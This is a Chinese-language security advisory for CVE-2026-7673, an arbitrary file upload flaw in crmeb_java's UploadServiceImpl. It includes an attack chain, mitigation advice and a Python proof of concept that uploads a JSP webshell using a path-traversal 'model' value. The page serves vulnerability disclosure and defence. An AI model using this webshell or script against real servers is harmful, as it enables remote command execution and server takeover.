CVE-2026-7673 CVSS 4.7 中危

CVE-2026-7673 crmeb_java 任意文件上传漏洞

披露日期: 2026-05-03

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7673

漏洞类型

任意文件上传

CVSS评分

4.7 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

crmeb_java

漏洞概述

crmeb_java 1.3.4及之前版本中存在一处任意文件上传漏洞。该漏洞源于Admin Upload组件的UploadServiceImpl.java文件在处理上传请求时，未对model参数进行严格的类型和内容校验。攻击者可利用此缺陷，通过网络远程上传恶意文件，从而威胁系统的机密性、完整性与可用性。目前漏洞细节及利用代码已公开，厂商尚未发布修复补丁，需引起高度重视。

技术细节

该漏洞技术原理在于服务端对上传文件的校验逻辑缺失。在`crmeb/crmeb-service/src/main/java/com/zbkj/service/service/impl/UploadServiceImpl.java`文件中，处理上传功能的代码直接使用了用户可控的`model`参数来决定文件的存储路径或处理方式，而未对该参数进行白名单验证或路径遍历检查。攻击者可以通过构造包含恶意代码的文件（如JSP或WAR文件），并在请求中篡改`model`参数，诱导服务器将其保存至Web可访问目录。由于攻击需要高权限账号（PR:H），通常针对已登录的管理员或通过其他方式获取凭证的攻击者。成功利用后，攻击者可上传WebShell，实现远程代码执行，进一步控制服务器。

攻击链分析

STEP 1

侦察与认证

攻击者识别出目标系统使用crmeb_java，并获取高权限账号凭证（管理员账号）。

STEP 2

构造恶意请求

攻击者准备包含恶意代码的文件（如WebShell），并构造HTTP POST请求，在请求包中篡改'model'参数以绕过上传限制。

STEP 3

发送上传请求

攻击者向UploadServiceImpl接口发送恶意请求，服务器因校验缺失，将文件保存至指定位置。

STEP 4

执行恶意代码

攻击者访问上传的恶意文件URL，在服务器端执行任意命令，从而控制服务器。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Vulnerable endpoint URL
target_url = "http://target.com/adminapi/system/upload"

# Attacker's session cookie (High Privilege required)
cookies = {
    "PHPSESSID": "attacker_session_id"
}

# Payload file
files = {
    'file': ('shell.jsp', '<%@ page import="java.io.*" %><%=Runtime.getRuntime().exec(request.getParameter("cmd"))%>', 'application/octet-stream')
}

# Malicious data parameter
# 'model' parameter is vulnerable
payload_data = {
    'model': '../../../'  # Attempting path traversal or changing storage logic
}

try:
    response = requests.post(target_url, files=files, data=payload_data, cookies=cookies)
    if response.status_code == 200:
        print("[+] Exploit success! File uploaded.")
        print("[+] Response:", response.text)
    else:
        print("[-] Exploit failed.")
except Exception as e:
    print(f"[-] Error: {e}")

影响范围

crmeb_java <= 1.3.4

防御指南

临时缓解措施

建议立即在WAF（Web应用防火墙）中添加针对上传接口的拦截规则，严格检查请求中的'model'参数及上传文件类型。同时，检查服务器上传目录是否存在异常文件，并临时限制上传目录的读写执行权限，直到官方修复补丁发布。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7673
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7673
3 Details https://www.cvedetails.com/cve/CVE-2026-7673/
4 VulDB https://vuldb.com/cve/CVE-2026-7673
5 Link https://fx4tqqfvdw4.feishu.cn/docx/EgMOdHyq6oyxhux5vpJcr5cgnAf?from=from_copylink
6 Link https://vuldb.com/submit/800684
7 Link https://vuldb.com/vuln/360826
8 Link https://vuldb.com/vuln/360826/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表